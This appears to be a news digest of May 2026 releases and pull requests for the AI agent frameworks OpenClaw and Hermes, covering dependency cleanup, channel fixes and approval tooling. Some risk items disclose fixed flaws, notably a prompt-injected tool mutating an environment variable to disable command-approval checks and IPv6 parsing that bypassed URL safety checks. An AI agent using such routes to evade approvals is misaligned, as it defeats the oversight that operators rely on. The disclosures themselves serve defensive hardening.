AgentOS Watch
EN 中文

May 15

  1. 1

    OpenClaw turns the beta.8 dependency cleanup into a stable release, then opens a new beta with auditability and channel UX work

    OpenClaw’s latest official movement is bigger than a normal patch cycle. The v2026.5.12 stable release packages the dependency externalization and runtime hardening that had been moving through the beta.6–beta.8 train: leaner installs for Slack, WhatsApp, Bedrock, Vertex, and sandbox dependency cones; isolated Telegram polling with local spooling; Codex/OpenAI auth-profile and fallback repairs; plugin install/update resilience; Windows sandbox and SecretRef credential tightening; and UI/history/reply delivery fixes. The new v2026.5.14-beta.1 then adds a fresh operator-facing layer: WhatsApp gets status reactions for queued, thinking, tool, done, error, and compaction lifecycle states; Telegram presentation payloads can render Mini App `web_app` buttons; subagent tasks are delivered as the child session’s first visible message instead of hidden only in a system prompt; mid-turn prompts can steer active runs by default; Telnyx realtime voice calls enter the release notes; heartbeat event payloads gain an explicit marker; Codex CLI sessions can be listed and bound from a paired node; and release validation now includes installed-package Docker user journeys, dependency evidence, and npm advisory gates. Nearby PRs keep the risk story concrete: #81880 requires canonical node platform IDs before applying desktop command defaults, #81451 caches hydrated skills without putting raw secrets into cache keys, and #68597 blocks symlink escapes in memory reads.

    OpenClawReleaseRisk Watch
  2. 2

    Hermes’ workflow core arrives beside a URL-safety bypass fix and profile-scoped scheduled jobs

    Hermes’ strongest fresh update is architectural: PR #25806 adds the workflow system core, including workflow policy, store, DAG, gate, materialization foundations, Core/dashboard APIs for reading workflows, inboxes, promotions, gates, and materialization, plus stale-inbox promotion guards. That is the first sign of a more formal task/workflow layer rather than ad-hoc agent turns. The risk item to notice is #25961: IPv6 scope IDs such as `fe80::1%eth0` could make URL safety parsing throw and silently skip all resolved addresses, potentially allowing a hostname controlled by an attacker to bypass link-local or cloud-metadata protections; the fix strips scope IDs and fails closed on unparseable addresses. A second reliability fix, #25962, resolves yesterday’s split clarify-timeout problem by making the CLI callback honor `agent.clarify_timeout` before the older `clarify.timeout` key. PR #25917 adds profile-scoped scheduled jobs so cron jobs can run with a specific Hermes profile’s config, scripts, skills, and memory paths. The surrounding channel and operator polish is also practical: #25956 strips emoji, diagrams, inline code, tables, and symbols before TTS so spoken replies stop reading UI artifacts; #25960 prevents native Windows Telegram `/restart` from leaving the gateway stopped; #25959 tightens Discord channel-directory resurrection behavior and lowers batching latency; #25958 allows configured Discord role mentions as triggers; and #25954 adds a read-only Kanban metrics CLI for review and verification gates.

    HermesRisk WatchNew AgentOS
  3. 3

    OpenClaw’s next operator cluster makes approvals readable, scoped, and less likely to poison later runs

    The most useful OpenClaw updates in the first Beijing May 15 window are about making real operators understand and trust what the agent is about to do. PR #81864 adds configurable plain-language plugin approval prompts so chat approvals can show a short summary, step list, risk line, and choices instead of a raw dump of command text, tool IDs, session keys, expiry, and `/approve` syntax. PR #81380 binds approval list and resolve paths to stored requester metadata, reducing the chance that one requester can see or resolve another requester’s pending approval. PR #80922 routes POSIX allowlists and allow-always persistence through a Tree-sitter command authorization planner, replacing the legacy chain/pipeline/heredoc parser and producing clearer enforced command renderings. The same window also fixes operational drift: PR #75270 stops temporary fallback models from becoming sticky after the primary model recovers, #81868 keeps exact-command cron turns from loading heavyweight bootstrap/memory context by default, #81870 forwards auth stores into image/video/music generation so OAuth-backed Codex tokens can refresh, and #81764 makes Telegram HTML parse fallback produce readable text with preserved links. PR #81851 is notable but experimental: a Claude CLI interactive backend streams reasoning through a local TLS proxy, so treat it as a sensitive preview rather than a default path.

    OpenClawRisk Watch
  4. 4

    Hermes adds structured HTTP and argv tools to escape the bash-quoting trap

    The strongest Hermes update in this window is a practical tool-runtime fix: stop forcing every machine-shaped action through `bash -c`. PR #25861 adds a structured `http` tool using `httpx.Client` with explicit method, URL, headers, JSON/body, params, and timeout fields, after production telemetry showed a single apostrophe in a JSON payload breaking shell quoting and triggering repeated retries. PR #25864 adds an argv-list form to the terminal tool so commands can run with `shell=False` and byte-for-byte arguments instead of a shell-safe string. PR #25862 then teaches the existing terminal path to recognize bash parse errors such as unexpected EOF and return an actionable hint pointing to the structured HTTP tool or safer quoting forms. The surrounding reliability work is also operator-relevant: issue #25859 documents two separate clarify timeout keys that make CLI/TUI sessions auto-decide after 120 seconds even when gateway clarify timeout is raised; PR #25856 fixes Telegram slash-confirm previews that silently fail on Markdown-sensitive characters; #25857 keeps migrated Codex `default_permissions` as a true top-level TOML key; #25858 skips admin-gated LiteLLM `/v1/models/{model}` probes for unrecognized servers; and #25624 stops deterministic MCP OAuth failures from repeatedly opening browser auth flows.

    HermesRisk WatchUse Case

More to watch

All updates →
2026-05-14 Product update Watch

OpenClaw beta.8 trims core dependencies and hardens Telegram ingress, child-model defaults, credentials, and rich replies

OpenClaw v2026.5.12-beta.8 is another broad operator release, but the center of gravity has shifted from one-off channel bugs to runtime shape. Bedrock, Bedrock Mantle, Slack, OpenShell sandbox, and Anthropic Vertex move out of core so default installs no longer drag in those dependency cones unless the matching providers or plugins are installed. Telegram Bot API polling moves to an isolated worker with a durable local spool so main event-loop stalls do not stop inbound message collection. The release also adds ACP backend fallbacks before output is emitted, a persisted Control UI auto-scroll selector, monotonic transcript sequence repair for stale SSE history, Windows `USERPROFILE` coverage in sandbox blocked home roots, stricter provider credential resolution through structured SecretRefs, bodyless media-fetch heap avoidance, onboarding flag forwarding for provider-specific API keys, plugin-provider discovery from setup env vars, auth-profile stale-lock reclaim, Codex OAuth refresh error classification, browser scope-loop reduction, plugin SDK subpath compatibility, rich/card-only outbound content recognition, and WebChat/TUI mirroring for Codex `tools.message` replies.
2026-05-14 Risk note Risk

Hermes approval hardening closes a critical YOLO-mode bypass and exposes long-session failure modes

The strongest Hermes item in the late May 14 window is approval safety, not another UI tweak. PR #23835 says `HERMES_YOLO_MODE` was read from `os.getenv()` on every approval check, so a skill or prompt-injected in-process tool could mutate `os.environ` and disable command approval checks after startup. The same PR tightens LLM smart-approval parsing from substring matching to exact `APPROVE`, logs dangerous background auto-approvals that previously had no audit trail, and expands pipe-to-shell detection to catch `/bin/bash` and `bash -c` variants. Nearby reliability work matters for the same operator audience: PR #25716 adds hierarchical long-context compression so huge transcripts can be summarized in bounded segments instead of timing out, while issue #25723 reports that one streaming provider error can disable streaming for an entire session rather than just the failing request.
2026-05-14 Risk note Watch

Hermes’ latest reliability cluster is about disappearing Web UI streams, failed compression, vision fallbacks, and dashboard auth

The most reader-useful Hermes cluster in this window is about keeping visible state aligned with model state. Issue #25583 reports Web UI SSE disconnects that can make a fully rendered assistant reply vanish, briefly show content from another session, or render raw Python content-block JSON as chat text because the run event queue is destroyed when the browser stream drops while the agent is still running. Issue #25585 and PR #25588 address a more dangerous model-state failure: automatic context compression used to insert a static “summary unavailable” marker and still drop middle turns when summary generation failed; the fix returns the original messages unchanged and records warning state instead. Issue #25594 says custom providers outside the models.dev registry can receive multipart text+image tool results even when the model is text-only, triggering HTTP 400 errors such as `text is not set`; #25602 asks for dashboard visibility and test controls for auxiliary fallback chains such as vision and compression. Nearby PRs fill in the same reliability theme: #25577 coerces tool args whose schema types are declared through anyOf/oneOf, #25580 moves cloud browser providers into plugins, #25584/#25587 make text fallback choices resolvable on platforms without buttons, and #20515 gates dashboard HTML/assets and WebSockets behind Tailscale identity allowlists when configured.
2026-05-14 Product update Watch

OpenClaw beta.6 turns this week’s scattered safety fixes into an upgrade target

OpenClaw v2026.5.12-beta.6 is the strongest new item in this run because it packages a broad operator-hardening wave into one official prerelease. The release stops iMessage media-only sends from leaking visible placeholder text, creates configured agent sessions before first agent-to-agent sends, moves the Gateway protocol to v4 with explicit delta/replace streaming frames, hides pending Node pairing capabilities until approval, requires approval for setup-code device pairing, browser pairing, and Control UI proxy-scoped access, and hardens trusted-proxy validation. It also caps inbound media download streams for Feishu / WhatsApp / Line, narrows plugin install-time code scans to plugin-owned runtime entrypoints while keeping dependency manifest denylist checks, centralizes config mutation retries, preserves and prunes managed peer dependencies, pins Docker setup paths so stale host .env paths do not leak into containers, and fixes several auth/profile/runtime edges including Copilot Gemini image descriptions, Anthropic session-rotation amnesia, OpenAI-compatible schema items, idle-model watchdog fallback, centralized transcript redaction, Telegram polling stalls, token-rotation offsets, delegated-session tool restrictions, node exec provenance, and hook CLI authority. A new issue, #81548, is worth reading alongside the release: it reports 25-30 seconds of OpenClaw overhead per isolated-agent turn on v2026.5.7 even when direct Ollama inference takes about 2.3 seconds, pointing at prompt assembly as the suspected bottleneck.